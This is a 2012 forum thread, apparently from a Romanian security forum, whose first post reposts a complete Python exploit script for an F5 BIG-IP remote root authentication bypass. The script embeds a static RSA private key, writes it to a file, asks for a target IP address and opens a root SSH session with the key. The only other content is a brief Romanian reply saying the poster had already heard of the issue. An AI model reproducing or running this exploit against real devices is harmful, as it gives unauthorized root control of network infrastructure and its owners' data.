The_Arhitect Posted June 13, 2012 Report Posted June 13, 2012 F5 BIG-IP Remote Root Authentication Bypass Vulnerability#!/usr/bin/python## Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)## Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass# http://www.secmaniac.com##import subprocess,osfilewrite = file("priv.key", "w")filewrite.write("""-----BEGIN RSA PRIVATE KEY-----MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rhUlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vkOzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKBgBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVLRTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBUOt0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4GLesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS-----END RSA PRIVATE KEY-----""")filewrite.close()subprocess.Popen("chmod 700 priv.key", shell=True).wait()ipaddr=raw_input("Enter the IP address of the F5: ")subprocess.Popen("ssh -i priv.key root@%s" % (ipaddr), shell=True).wait()if os.path.isfile("priv.key"): os.remove("priv.key")Sursa: F5 BIG-IP Remote Root Authentication Bypass Vulnerability Quote
Zatarra Posted June 14, 2012 Report Posted June 14, 2012 Oricum te cam pisi pe ele de BIG-IP-uri.. Auzisem de faza asta Quote
